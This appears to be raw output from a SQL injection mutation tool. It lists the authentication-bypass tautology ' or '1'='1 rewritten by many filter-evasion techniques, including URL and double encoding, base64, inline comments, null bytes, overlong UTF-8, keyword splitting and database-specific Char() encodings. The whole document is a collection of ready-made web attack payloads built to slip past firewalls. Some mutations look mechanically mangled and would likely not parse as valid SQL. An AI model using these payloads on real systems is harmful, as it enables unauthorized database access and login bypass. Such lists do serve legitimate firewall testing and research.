Result: \%00%27%0d%0aOr%0d%0a\%00%271\%00%27=\%00%271%00
Mutation algoritm:caseinsensitive 
Result: \' Or \'1\'=\'1
Mutation algoritm:bypass_SQL_Injection_Normalization 
Result: ["\\'+or+\\'1\\'=\\'1", "\\'+or+\\'1\\'=\\'1"]
Mutation algoritm:bypass_SQL_Injection_Normalization 
Result: ["\\'+or+\\'1\\'=\\'1", "\\'+or+\\'1\\'=\\'1"]
Mutation algoritm:base64encode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: LyohKi9cLyohKi8lLyohMDAqLyUvKiEyNyovJS8qITBkKi8lLyohMGFvciovJS8qITBkKi8lLyohMGEqL1wvKiEqLyUvKiEwMCovJS8qITI3MSovXC8qISovJS8qITAwKi8lLyohMjcqLz0vKiEqL1wvKiEqLyUvKiEwMCovJS8qITI3MSovJS8qITAwKi8=
Mutation algoritm:base64encode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: XCUvKiEwMCUyNyUwZCUwYW9yJTBkJTBhXCUwMCUyNzFcJTAwJTI3PVwlMDAlMjcxJTAwKi8=
Mutation algoritm:base64encode space20d0a appendnullbyte apostrophenullencode 
Result: XCUwMCUyNyUwZCUwYW9yJTBkJTBhXCUwMCUyNzFcJTAwJTI3PVwlMDAlMjcxJTAw
Mutation algoritm:base64encode 
Result: XCcgb3IgXCcxXCc9XCcx
Mutation algoritm:apostrophemask 
Result: \%EF%BC%87 or \%EF%BC%871\%EF%BC%87=\%EF%BC%871
Mutation algoritm:usecomments space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: ['/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/', '/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/', '/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/', '/*!*/\\/*!*/%/*!/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/*/', '/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!27*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0d*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0aor*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0d*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0a*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!271*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!27*/*/*!*///*!*/=/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!271*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/']
Mutation algoritm:usecomments space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: ['/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/', '/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/', '/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/', '/*!*/\\/*!*/%/*!/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/*/', '/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!27*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0d*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0aor*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0d*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0a*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!271*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!27*/*/*!*///*!*/=/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!271*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/']
Mutation algoritm:usecomments space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: ['\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '\\%/*!/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/*/', '/*!*/\\/*!*/%/*!*///*!*/*/*!*/!/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/*/*!*///*!*/']
Mutation algoritm:usecomments space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: ['\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '\\%/*!/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/*/', '/*!*/\\/*!*/%/*!*///*!*/*/*!*/!/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/*/*!*///*!*/']
Mutation algoritm:usecomments space20d0a appendnullbyte apostrophenullencode 
Result: ['\\%00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00', '\\%00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00', '\\%00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00', '\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/']
Mutation algoritm:usecomments space20d0a appendnullbyte apostrophenullencode 
Result: ['\\%00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00', '\\%00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00', '\\%00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00', '\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/']
Mutation algoritm:usecomments 
Result: ["\\'/**/or/**/\\'1\\'=\\'1", "\\'/%2A%2A/or/%2A%2A/\\'1\\'=\\'1", "\\'%0d%0aor%0d%0a\\'1\\'=\\'1", "\\' /*!or \\'1\\'=\\'1*/", "/*!*/\\/*!*/'/*!*/ /*!or*/ /*!*/\\/*!*/'/*!1*/\\/*!*/'/*!*/=/*!*/\\/*!*/'/*!1*/"]
Mutation algoritm:usecomments 
Result: ["\\'/**/or/**/\\'1\\'=\\'1", "\\'/%2A%2A/or/%2A%2A/\\'1\\'=\\'1", "\\'%0d%0aor%0d%0a\\'1\\'=\\'1", "\\' /*!or \\'1\\'=\\'1*/", "/*!*/\\/*!*/'/*!*/ /*!or*/ /*!*/\\/*!*/'/*!1*/\\/*!*/'/*!*/=/*!*/\\/*!*/'/*!1*/"]
Mutation algoritm:usecomments 
Result: ["\\'/**/or/**/\\'1\\'=\\'1", "\\'/%2A%2A/or/%2A%2A/\\'1\\'=\\'1", "\\'%0d%0aor%0d%0a\\'1\\'=\\'1", "\\' /*!or \\'1\\'=\\'1*/", "/*!*/\\/*!*/'/*!*/ /*!or*/ /*!*/\\/*!*/'/*!1*/\\/*!*/'/*!*/=/*!*/\\/*!*/'/*!1*/"]
Mutation algoritm:usecomments 
Result: ["\\'/**/or/**/\\'1\\'=\\'1", "\\'/%2A%2A/or/%2A%2A/\\'1\\'=\\'1", "\\'%0d%0aor%0d%0a\\'1\\'=\\'1", "\\' /*!or \\'1\\'=\\'1*/", "/*!*/\\/*!*/'/*!*/ /*!or*/ /*!*/\\/*!*/'/*!1*/\\/*!*/'/*!*/=/*!*/\\/*!*/'/*!1*/"]
Mutation algoritm:usecomments 
Result: ["\\'/**/or/**/\\'1\\'=\\'1", "\\'/%2A%2A/or/%2A%2A/\\'1\\'=\\'1", "\\'%0d%0aor%0d%0a\\'1\\'=\\'1", "\\' /*!or \\'1\\'=\\'1*/", "/*!*/\\/*!*/'/*!*/ /*!or*/ /*!*/\\/*!*/'/*!1*/\\/*!*/'/*!*/=/*!*/\\/*!*/'/*!1*/"]
Mutation algoritm:urlecode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %2F%2A%21%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%2100%2A%2F%25%2F%2A%2127%2A%2F%25%2F%2A%210d%2A%2F%25%2F%2A%210aor%2A%2F%25%2F%2A%210d%2A%2F%25%2F%2A%210a%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%2100%2A%2F%25%2F%2A%21271%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%2100%2A%2F%25%2F%2A%2127%2A%2F%3D%2F%2A%21%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%2100%2A%2F%25%2F%2A%21271%2A%2F%25%2F%2A%2100%2A%2F
Mutation algoritm:urlecode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %5C%25%2F%2A%2100%2527%250d%250aor%250d%250a%5C%2500%25271%5C%2500%2527%3D%5C%2500%25271%2500%2A%2F
Mutation algoritm:urlecode space20d0a appendnullbyte apostrophenullencode 
Result: %5C%2500%2527%250d%250aor%250d%250a%5C%2500%25271%5C%2500%2527%3D%5C%2500%25271%2500
Mutation algoritm:urlecode 
Result: %5C%27%20or%20%5C%271%5C%27%3D%5C%271
Mutation algoritm:unmagicquotes 
Result: \%bf%27 or \'1\'=\'1-- 
Mutation algoritm:StringConcatenation space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: /*!*/\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0EXEC(a' + 'or)*/%/*!0d*/%/*!0a*/\/*!*/%/*!00*/%/*!271*/\/*!*/%/*!00*/%/*!27*/=/*!*/\/*!*/%/*!00*/%/*!271*/%/*!00*/
Mutation algoritm:StringConcatenation space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: \%/*!00%27%0d%0EXEC(a' + 'or)%0d%0a\%00%271\%00%27=\%00%271%00*/
Mutation algoritm:StringConcatenation space20d0a appendnullbyte apostrophenullencode 
Result: \%00%27%0d%0EXEC(a' + 'or)%0d%0a\%00%271\%00%27=\%00%271%00
Mutation algoritm:StringConcatenation 
Result: \' EXEC(o' + 'r) \'1\'=\'1
Mutation algoritm:space2mssqlhash 
Result: \'%23%0Aor%23%0A\'1\'=\'1
Mutation algoritm:space2morecomment 
Result: \'/**_**/or/**_**/\'1\'=\'1
Mutation algoritm:space2dash 
Result: \'--dfsHujZGrdb%0Aor--zOtgzq%0A\'1\'=\'1
Mutation algoritm:overlongutf8 space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB27%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0d%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0aor%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0d%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0a%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB271%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB27%C0%AA%C0%AF%C0%BF%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB271%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF
Mutation algoritm:overlongutf8 space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %C0%DE%C0%AF%C0%AF%C0%AA%C0%AB00%27%0d%0aor%0d%0a%C0%DE%00%271%C0%DE%00%27%C0%BF%C0%DE%00%271%00%C0%AA%C0%AF
Mutation algoritm:overlongutf8 space20d0a appendnullbyte apostrophenullencode 
Result: %C0%DE%00%27%0d%0aor%0d%0a%C0%DE%00%271%C0%DE%00%27%C0%BF%C0%DE%00%271%00
Mutation algoritm:overlongutf8 
Result: %C0%DE%C0%AF%C0%AAor%C0%AA%C0%DE%C0%AF1%C0%DE%C0%AF%C0%BF%C0%DE%C0%AF1
Mutation algoritm:modsecurityzeroversioned 
Result: \' /*!00000or \'1\'=\'1*/
Mutation algoritm:keywordsplitting space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: /*!*/\/*!*/%/*!0<0*/%/*!2<7*/%/*!0<d*/%/*!0ao<r*/%/*!0<d*/%/*!0<a*/\/*!*/%/*!0<0*/%/*!2<71*/\/*!*/%/*!0<0*/%/*!2<7*/=/*!*/\/*!*/%/*!0<0*/%/*!2<71*/%/*!0<0*/
Mutation algoritm:keywordsplitting space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: \%/*!0<0%2<7%0<d%0ao<r%0<d%0<a\%0<0%2<71\%0<0%2<7=\%0<0%2<71%0<0*/
Mutation algoritm:keywordsplitting space20d0a appendnullbyte apostrophenullencode 
Result: \%0<0%2<7%0<d%0a<or%0<d%0<a\%0<0%2<71\%0<0%2<7=\%0<0%27<1%0<0
Mutation algoritm:keywordsplitting 
Result: \' o<r \'1\'=\'1
Mutation algoritm:htmlencode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: &#47;&#42;&#33;&#42;&#47;&#92;&#47;&#42;&#33;&#42;&#47;&#37;&#47;&#42;&#33;00&#42;&#47;&#37;&#47;&#42;&#33;27&#42;&#47;&#37;&#47;&#42;&#33;0d&#42;&#47;&#37;&#47;&#42;&#33;0aor&#42;&#47;&#37;&#47;&#42;&#33;0d&#42;&#47;&#37;&#47;&#42;&#33;0a&#42;&#47;&#92;&#47;&#42;&#33;&#42;&#47;&#37;&#47;&#42;&#33;00&#42;&#47;&#37;&#47;&#42;&#33;271&#42;&#47;&#92;&#47;&#42;&#33;&#42;&#47;&#37;&#47;&#42;&#33;00&#42;&#47;&#37;&#47;&#42;&#33;27&#42;&#47;&#61;&#47;&#42;&#33;&#42;&#47;&#92;&#47;&#42;&#33;&#42;&#47;&#37;&#47;&#42;&#33;00&#42;&#47;&#37;&#47;&#42;&#33;271&#42;&#47;&#37;&#47;&#42;&#33;00&#42;&#47;
Mutation algoritm:htmlencode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: &#92;&#37;&#47;&#42;&#33;00&#37;27&#37;0d&#37;0aor&#37;0d&#37;0a&#92;&#37;00&#37;271&#92;&#37;00&#37;27&#61;&#92;&#37;00&#37;271&#37;00&#42;&#47;
Mutation algoritm:htmlencode space20d0a appendnullbyte apostrophenullencode 
Result: &#92;&#37;00&#37;27&#37;0d&#37;0aor&#37;0d&#37;0a&#92;&#37;00&#37;271&#92;&#37;00&#37;27&#61;&#92;&#37;00&#37;271&#37;00
Mutation algoritm:htmlencode 
Result: &#92;&#39;&#32;or&#32;&#92;&#39;1&#92;&#39;&#61;&#92;&#39;1
Mutation algoritm:escapequotes 
Result: \\' or \\'1\\'=\\'1
Mutation algoritm:doubleurlecode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %252F%252A%2521%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%252100%252A%252F%2525%252F%252A%252127%252A%252F%2525%252F%252A%25210d%252A%252F%2525%252F%252A%25210aor%252A%252F%2525%252F%252A%25210d%252A%252F%2525%252F%252A%25210a%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%252100%252A%252F%2525%252F%252A%2521271%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%252100%252A%252F%2525%252F%252A%252127%252A%252F%253D%252F%252A%2521%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%252100%252A%252F%2525%252F%252A%2521271%252A%252F%2525%252F%252A%252100%252A%252F
Mutation algoritm:doubleurlecode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %255C%2525%252F%252A%252100%252527%25250d%25250aor%25250d%25250a%255C%252500%2525271%255C%252500%252527%253D%255C%252500%2525271%252500%252A%252F
Mutation algoritm:doubleurlecode space20d0a appendnullbyte apostrophenullencode 
Result: %255C%252500%252527%25250d%25250aor%25250d%25250a%255C%252500%2525271%255C%252500%252527%253D%255C%252500%2525271%252500
Mutation algoritm:doubleurlecode 
Result: %255C%2527%2520or%2520%255C%25271%255C%2527%253D%255C%25271
Mutation algoritm:charencode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %2F%2A%21%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%21%30%30%2A%2F%25%2F%2A%21%32%37%2A%2F%25%2F%2A%21%30%64%2A%2F%25%2F%2A%21%30%61%6F%72%2A%2F%25%2F%2A%21%30%64%2A%2F%25%2F%2A%21%30%61%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%21%30%30%2A%2F%25%2F%2A%21%32%37%31%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%21%30%30%2A%2F%25%2F%2A%21%32%37%2A%2F%3D%2F%2A%21%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%21%30%30%2A%2F%25%2F%2A%21%32%37%31%2A%2F%25%2F%2A%21%30%30%2A%2F
Mutation algoritm:charencode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %5C%25%2F%2A%21%30%30%27%0d%0a%6F%72%0d%0a%5C%00%27%31%5C%00%27%3D%5C%00%27%31%00%2A%2F
Mutation algoritm:charencode space20d0a appendnullbyte apostrophenullencode 
Result: %5C%00%27%0d%0a%6F%72%0d%0a%5C%00%27%31%5C%00%27%3D%5C%00%27%31%00
Mutation algoritm:charencode 
Result: %5C%27%20%6F%72%20%5C%27%31%5C%27%3D%5C%27%31
Mutation algoritm:chardoubleencode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %252F%252A%2521%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%2521%2530%2530%252A%252F%2525%252F%252A%2521%2532%2537%252A%252F%2525%252F%252A%2521%2530%2564%252A%252F%2525%252F%252A%2521%2530%2561%256F%2572%252A%252F%2525%252F%252A%2521%2530%2564%252A%252F%2525%252F%252A%2521%2530%2561%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%2521%2530%2530%252A%252F%2525%252F%252A%2521%2532%2537%2531%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%2521%2530%2530%252A%252F%2525%252F%252A%2521%2532%2537%252A%252F%253D%252F%252A%2521%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%2521%2530%2530%252A%252F%2525%252F%252A%2521%2532%2537%2531%252A%252F%2525%252F%252A%2521%2530%2530%252A%252F
Mutation algoritm:chardoubleencode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %255C%2525%252F%252A%2521%2530%2530%2527%250d%250a%256F%2572%250d%250a%255C%2500%2527%2531%255C%2500%2527%253D%255C%2500%2527%2531%2500%252A%252F
Mutation algoritm:chardoubleencode space20d0a appendnullbyte apostrophenullencode 
Result: %255C%2500%2527%250d%250a%256F%2572%250d%250a%255C%2500%2527%2531%255C%2500%2527%253D%255C%2500%2527%2531%2500
Mutation algoritm:chardoubleencode 
Result: %255C%2527%2520%256F%2572%2520%255C%2527%2531%255C%2527%253D%255C%2527%2531
Mutation algoritm:CharacterEncoding_char_MSSql space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: /*!*/\/*!*/%/*!Char(0000030)+Char(0000030)*/%/*!Char(0000032)+Char(0000037)*/%/*!Char(0000030)+Char(0000064)*/%/*!Char(0000030)+Char(0000061)+Char(000006f)+Char(0000072)*/%/*!Char(0000030)+Char(0000064)*/%/*!Char(0000030)+Char(0000061)*/\/*!*/%/*!Char(0000030)+Char(0000030)*/%/*!Char(0000032)+Char(0000037)+Char(0000031)*/\/*!*/%/*!Char(0000030)+Char(0000030)*/%/*!Char(0000032)+Char(0000037)*/=/*!*/\/*!*/%/*!Char(0000030)+Char(0000030)*/%/*!Char(0000032)+Char(0000037)+Char(0000031)*/%/*!Char(0000030)+Char(0000030)*/
Mutation algoritm:CharacterEncoding_char_MSSql space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: \%/*!Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)%Char(0000030)+Char(0000064)%Char(0000030)+Char(0000061)+Char(000006f)+Char(0000072)%Char(0000030)+Char(0000064)%Char(0000030)+Char(0000061)\%Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)+Char(0000031)\%Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)=\%Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)+Char(0000031)%Char(0000030)+Char(0000030)*/
Mutation algoritm:CharacterEncoding_char_MSSql space20d0a appendnullbyte apostrophenullencode 
Result: \%Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)%Char(0000030)+Char(0000064)%Char(0000030)+Char(0000061)+Char(000006f)+Char(0000072)%Char(0000030)+Char(0000064)%Char(0000030)+Char(0000061)\%Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)+Char(0000031)\%Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)=\%Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)+Char(0000031)%Char(0000030)+Char(0000030)
Mutation algoritm:CharacterEncoding_char_MSSql 
Result: \' Char(000006f)+Char(0000072) \'Char(0000031)\'=\'Char(0000031)
Mutation algoritm:CharacterEncoding_charOracle space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: /*!*/\/*!*/%/*!Char(0000030) || Char(0000030)*/%/*!Char(0000032) || Char(0000037)*/%/*!Char(0000030) || Char(0000064)*/%/*!Char(0000030) || Char(0000061) || Char(000006f) || Char(0000072)*/%/*!Char(0000030) || Char(0000064)*/%/*!Char(0000030) || Char(0000061)*/\/*!*/%/*!Char(0000030) || Char(0000030)*/%/*!Char(0000032) || Char(0000037) || Char(0000031)*/\/*!*/%/*!Char(0000030) || Char(0000030)*/%/*!Char(0000032) || Char(0000037)*/=/*!*/\/*!*/%/*!Char(0000030) || Char(0000030)*/%/*!Char(0000032) || Char(0000037) || Char(0000031)*/%/*!Char(0000030) || Char(0000030)*/
Mutation algoritm:CharacterEncoding_charOracle space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: \%/*!Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037)%Char(0000030) || Char(0000064)%Char(0000030) || Char(0000061) || Char(000006f) || Char(0000072)%Char(0000030) || Char(0000064)%Char(0000030) || Char(0000061)\%Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037) || Char(0000031)\%Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037)=\%Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037) || Char(0000031)%Char(0000030) || Char(0000030)*/
Mutation algoritm:CharacterEncoding_charOracle space20d0a appendnullbyte apostrophenullencode 
Result: \%Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037)%Char(0000030) || Char(0000064)%Char(0000030) || Char(0000061) || Char(000006f) || Char(0000072)%Char(0000030) || Char(0000064)%Char(0000030) || Char(0000061)\%Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037) || Char(0000031)\%Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037)=\%Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037) || Char(0000031)%Char(0000030) || Char(0000030)
Mutation algoritm:CharacterEncoding_charOracle 
Result: \' Char(000006f) || Char(0000072) \'Char(0000031)\'=\'Char(0000031)
Mutation algoritm:CharacterEncoding_charMysql space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: Char()/Char()*Char()!Char()*Char()/Char()\Char()/Char()*Char()!Char()*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000030)*Char()/Char()%Char()/Char()*Char()!Char(0000032,0000037)*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000064)*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000061,000006f,0000072)*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000064)*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000061)*Char()/Char()\Char()/Char()*Char()!Char()*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000030)*Char()/Char()%Char()/Char()*Char()!Char(0000032,0000037,0000031)*Char()/Char()\Char()/Char()*Char()!Char()*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000030)*Char()/Char()%Char()/Char()*Char()!Char(0000032,0000037)*Char()/Char()=Char()/Char()*Char()!Char()*Char()/Char()\Char()/Char()*Char()!Char()*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000030)*Char()/Char()%Char()/Char()*Char()!Char(0000032,0000037,0000031)*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000030)*Char()/Char()
Mutation algoritm:CharacterEncoding_charMysql space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: Char()\Char()%Char()/Char()*Char()!Char(0000030,0000030)%Char(0000032,0000037)%Char(0000030,0000064)%Char(0000030,0000061,000006f,0000072)%Char(0000030,0000064)%Char(0000030,0000061)\Char()%Char(0000030,0000030)%Char(0000032,0000037,0000031)\Char()%Char(0000030,0000030)%Char(0000032,0000037)=Char()\Char()%Char(0000030,0000030)%Char(0000032,0000037,0000031)%Char(0000030,0000030)*Char()/Char()
Mutation algoritm:CharacterEncoding_charMysql space20d0a appendnullbyte apostrophenullencode 
Result: Char()\Char()%Char(0000030,0000030)%Char(0000032,0000037)%Char(0000030,0000064)%Char(0000030,0000061,000006f,0000072)%Char(0000030,0000064)%Char(0000030,0000061)\Char()%Char(0000030,0000030)%Char(0000032,0000037,0000031)\Char()%Char(0000030,0000030)%Char(0000032,0000037)=Char()\Char()%Char(0000030,0000030)%Char(0000032,0000037,0000031)%Char(0000030,0000030)
Mutation algoritm:CharacterEncoding_charMysql 
Result: Char()\Char()'Char() Char(000006f,0000072) Char()\Char()'Char(0000031)\Char()'Char()=Char()\Char()'Char(0000031)
